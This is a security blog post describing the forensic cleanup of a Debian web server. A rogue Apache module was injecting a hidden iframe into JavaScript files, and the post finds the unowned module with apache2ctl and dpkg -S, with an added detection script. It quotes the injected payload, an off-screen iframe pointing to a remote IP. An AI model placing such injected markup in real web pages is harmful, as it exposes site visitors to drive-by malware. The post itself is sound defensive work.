
Sucuri Blog

Website Security News


Web Server Compromise – Debian Distro – Identify and Remove Corrupt Apache Modules

February 6, 2013, by Tony Perez


Came across another server compromise this week. The client was complaining that the following kept being injected into their JavaScript files:

document.write("<style.vb4brk { position:absolute; left:-1655px; top:-1476px} </style> 
<div class="vb4rk"><iframe 
src="httx:// 149.47.154.253/fee1f3119b234cb79f953e92281b12af/q.php" width="231" height="330">
</iframe></div>'); /*!

Fortunately, the client was working off a VPS. That allowed us to dig deeper into the server itself rather than just cleaning the files, and to address the root cause. Looking at the server we quickly realized that a bad Apache module had been injected. Unfortunately, because this was a Debian distribution, the rpm-based commands we provided in our last post don't apply here.

Become Oriented

If you work on various NIX distributions you'll always want to get your orientation first. What OS are you working with? How is it configured? Every box is different, so take a few minutes up front to get your baseline; it will work wonders as you continue your investigation.

Check your version:

# cat /proc/version 

- or -

cat /etc/*-release

In my case, the version worked:

# cat /proc/version
Linux version 2.6.26-2-amd64 (Debian 2.6.26-25lenny1) (dannf@debian.org) ...

Also note that on Debian the Apache package and binary are named apache2, not httpd, so that is what you'll have to look for. To see the compiled-in modules you'll want to leverage this:

# apache2 -l

Sample output:

Compiled in modules:
  core.c
  mod_log_config.c
  mod_logio.c
  prefork.c
  http_core.c
  mod_so.c

To identify what modules are being loaded you'll run this:

# apache2ctl -M

Sample output:

Loaded Modules:
 core_module (static)
 log_config_module (static)
 logio_module (static)
 mpm_prefork_module (static)
 http_module (static)
 ........

Now Find and Remove

The easiest way to identify how your Apache install has been configured on your Debian distro is to identify where the Apache modules are being loaded from, then check which package (if any) owns each of them.

# grep -r "\.so" /path/to/your/Apache/install/

This would provide you a list of all the modules and where they are being loaded from, something like this:

# grep -r ".so" .
./mods-available/file_cache.load:LoadModule file_cache_module /usr/lib/apache2/modules/mod_file_cache.so
./mods-available/usertrack.load:LoadModule usertrack_module /usr/lib/apache2/modules/mod_usertrack.so
etc ...

You should notice the location here:

/usr/lib/apache2/modules/

You also want to know that there are two different directories in the Apache install:

/etc/apache2/mods-available/

and 

 /etc/apache2/mods-enabled/

The names give it away: mods-available holds a .load/.conf pair for every module installed, and mods-enabled holds symlinks to the ones actually loaded. But don't be fooled, browsing those directories alone won't serve you much good when looking for a bad module, because a rogue LoadModule line can be slipped into a perfectly legitimate .load file. A more effective approach is to ask dpkg which package owns each file in the modules directory. This is similar to our recommendation in the last post of using rpm to identify which packages own the modules:

# dpkg -S /usr/lib/apache2/modules/*

If you check the man page for dpkg you'll see that the -S option is the one that identifies ownership:

  -S|--search  ...        Find package(s) owning file(s).

Running that you would likely see something like this:

dpkg: /usr/lib/apache2/modules/mod_sec2_env.so not found.

And yes, that is the bad module: mod_sec2_env.so

Remove the module, delete the LoadModule line that referenced it, and restart Apache; that should get you back up and going. Re-run dpkg -S against the modules directory and apache2ctl -M afterwards to confirm nothing unowned is still being loaded. FYI, if you had focused solely on the mods-available or mods-enabled directories you would have missed this, as the .load file referencing the bad module was a legitimate one:

./mods-available/include.load
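The grep and dpkg -S steps above can be folded into one check that walks every LoadModule directive under the Apache config tree and reports the shared objects no package owns. This is an added example, not the post's own code: it assumes the config tree is passed as the first argument (Debian's /etc/apache2 by default), resolves relative module paths against that directory (Debian's ServerRoot), and lets the package query command be overridden through DPKG_CMD so the logic can be exercised on a box without dpkg.

```shell
#!/bin/sh
# Added example (not from the post): report Apache modules referenced by a
# LoadModule directive that no Debian package owns, or that are missing from
# disk. Usage: sh check_modules.sh /etc/apache2
#
# Assumption: DPKG_CMD names the package-ownership query tool; it defaults
# to dpkg and is only made overridable so the script can be tested offline.
DPKG_CMD="${DPKG_CMD:-dpkg}"

# list_load_modules DIR
# Print "config_file<TAB>module_path" for every uncommented LoadModule
# directive under DIR. The whole tree is searched, not just mods-enabled,
# because a rogue line can hide in any otherwise-legitimate .load file.
list_load_modules() {
    dir="$1"
    grep -rE '^[[:space:]]*LoadModule[[:space:]]+' "$dir" 2>/dev/null |
    while IFS= read -r line; do
        file="${line%%:*}"     # grep -r prefixes each hit with its file name
        rest="${line#*:}"
        # A directive reads: LoadModule <module_name> <path/to/module.so>
        path=$(printf '%s\n' "$rest" | awk '{print $3}')
        [ -n "$path" ] && printf '%s\t%s\n' "$file" "$path"
    done
}

# owned_by_package PATH
# True when "dpkg -S PATH" finds an owning package. dpkg exits non-zero (and
# prints "not found" / "no path found") for files no package installed.
owned_by_package() {
    "$DPKG_CMD" -S "$1" >/dev/null 2>&1
}

# find_rogue_modules DIR
# Print "status<TAB>config_file<TAB>module_path" for each referenced module
# that is either unowned (present on disk but installed by no package) or
# missing (referenced but absent). Package-owned modules are not reported.
find_rogue_modules() {
    dir="${1:-/etc/apache2}"
    tab=$(printf '\t')
    list_load_modules "$dir" | sort -u |
    while IFS="$tab" read -r file path; do
        case "$path" in
            /*) ;;                     # absolute path, use as-is
            *)  path="$dir/$path" ;;   # relative to ServerRoot (assumed = DIR)
        esac
        if ! owned_by_package "$path"; then
            if [ -e "$path" ]; then
                printf 'unowned\t%s\t%s\n' "$file" "$path"
            else
                printf 'missing\t%s\t%s\n' "$file" "$path"
            fi
        fi
    done
}

# Only scan when a config directory is given on the command line, so that
# sourcing the file just defines the functions.
if [ "$#" -gt 0 ]; then
    rogue=$(find_rogue_modules "$1")
    if [ -n "$rogue" ]; then
        printf 'Modules referenced under %s that no package owns:\n%s\n' "$1" "$rogue"
        exit 1
    fi
    echo "All LoadModule targets under $1 are owned by a package."
fi
```

An "unowned" line is the case from this post: the .so exists, Apache loads it, and dpkg knows nothing about it. A "missing" line is a dangling reference worth looking at too, since it usually means someone removed a file without cleaning up the directive that loaded it. A package-owned module that has been modified in place is not caught by ownership alone; debsums (or dpkg -V on newer releases) is the complementary check for that.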

Cheers.


If you find yourself with similar issues, or think you are suffering a compromise please send us a note info@sucuri.net


Categories: Security Education, Web Pros. Tags: Hacked Websites, Server Security, Webserver Infections

About Tony Perez

Tony is the Head of Security Products at GoDaddy and Sucuri Co-Founder. His passion lies in educating and bringing awareness about online threats to business owners. His passions revolve around understanding the psychology of bad actors, the impacts and havoc hacks have on website owners, and thinking through the evolution of attacks. You can find his personal thoughts on security at perezbox.com and you can follow him on Twitter at @perezbox.

Reader Interactions

Comments

  1. yepi kizi

    March 14, 2013

    Thank you for this post, it was a great read which was extremely helpful.

  2. Yepi Friv

    March 21, 2013

    Thanks a lot for sharing a very detailed article with us.

  3. kizi

    March 27, 2013

    Very detailed instructions. I'll follow you daily.

    • JoeDog

      April 3, 2013

      If he was as good as you let on, he would have deleted this link spam….

  4. Tim Stoop

    April 3, 2013

    Very nice, we’ve created an Icinga check for this, detailed here: https://blog.kumina.nl/2013/04/checking-for-rogue-apache-modules/

  5. Alen

    June 7, 2013

    How do you prevent this from happening again?
